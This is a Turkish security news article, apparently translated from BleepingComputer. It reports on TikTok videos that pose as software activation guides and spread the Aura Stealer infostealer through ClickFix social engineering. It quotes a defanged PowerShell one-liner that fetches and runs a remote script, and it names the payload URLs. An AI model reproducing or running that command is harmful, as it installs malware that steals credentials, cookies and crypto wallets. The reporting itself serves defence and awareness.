Siber suçlular, bilgi çalan kötü amaçlı yazılımları yaymak için Windows, Spotify ve Netflix gibi popüler yazılımlar için ücretsiz etkinleştirme kılavuzları görünümündeki TikTok videolarını kullanıyor.
ISC Sorumlusu Xavier Mertens, Trend Micro’nun Mayıs ayında gözlemlediği kampanyanın büyük ölçüde aynısı olan devam eden kampanyayı fark etti
BleepingComputer tarafından görülen TikTok videoları, Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro ve Discord Nitro gibi yasal ürünlerin yanı sıra Netflix ve Spotify Premium gibi uydurma hizmetlerin nasıl etkinleştirileceğine ilişkin talimatlar sunuyormuş gibi görünüyor.
Kaynak: BleepingComputer.com
Videolar, meşru “düzeltmeler” gibi görünen veya kullanıcıları kötü amaçlı PowerShell komutlarını veya bilgisayarlarına kötü amaçlı yazılım bulaştıran diğer komut dosyalarını çalıştırmaya yönlendiren talimatlar sağlayan bir sosyal mühendislik tekniği olan ClickFix saldırısı gerçekleştiriyor.
Her videoda tek satırlık kısa bir komut görüntülenir ve izleyicilere bu komutu PowerShell’de yönetici olarak çalıştırmaları söylenir:
iex (irm slmgr[.]win/photoshop)
URL’deki program adının, kimliğine bürünülen programa bağlı olarak farklı olacağına dikkat edilmelidir. Örneğin, sahte Windows aktivasyon videolarında, aşağıdakileri içeren URL yerine Photoshopşunları içerecektir pencereler.
Bu kampanyada, komut yürütüldüğünde PowerShell uzak siteye bağlanır slmgr[.]Başka bir PowerShell betiğini almak ve yürütmek için win.
Bu komut dosyası, Cloudflare sayfalarından iki yürütülebilir dosyayı indirir; ilk yürütülebilir dosya https://file-epq adresinden indirilir.[.]sayfalar[.]dev/updater.exe [VirusTotal]. Bu yürütülebilir dosya, Aura Stealer bilgi hırsızlığı yapan kötü amaçlı yazılımın bir çeşididir.
Aura Stealer, tarayıcılardan kayıtlı kimlik bilgilerini, kimlik doğrulama çerezlerini, kripto para cüzdanlarını ve diğer uygulamalardaki kimlik bilgilerini toplar ve bunları saldırganlara yükleyerek hesaplarınıza erişmelerini sağlar.
Mertens, source.exe adlı ek bir yükün indirileceğini söylüyor [VirusTotal].NET’in yerleşik Visual C# Derleyicisini (csc.exe) kullanarak kodu kendi kendine derlemek için kullanılır. Bu kod daha sonra belleğe enjekte edilir ve başlatılır.
Ek yükün amacı belirsizliğini koruyor.
Bu adımları uygulayan kullanıcılar, tüm kimlik bilgilerinin ele geçirildiğini düşünmeli ve ziyaret ettikleri tüm sitelerdeki şifrelerini derhal sıfırlamalıdır.
ClickFix saldırıları geçtiğimiz yıl oldukça popüler hale geldi ve fidye yazılımı ve kripto para hırsızlığı kampanyalarında çeşitli kötü amaçlı yazılım türlerini dağıtmak için kullanıldı.
Genel bir kural olarak, kullanıcılar hiçbir zaman bir web sitesinden metin kopyalamamalı ve bunu Dosya Gezgini adres çubuğu, komut istemi, PowerShell istemleri, macOS terminali ve Linux kabukları dahil olmak üzere bir işletim sistemi iletişim kutusunda çalıştırmamalıdır.
Ortamların %46’sında şifreler kırıldı; bu oran geçen yılki %25’ten neredeyse iki katına çıktı.
Önleme, tespit ve veri hırsızlığı eğilimlerine ilişkin daha fazla bulguya kapsamlı bir bakış için Picus Blue Report 2025’i hemen edinin.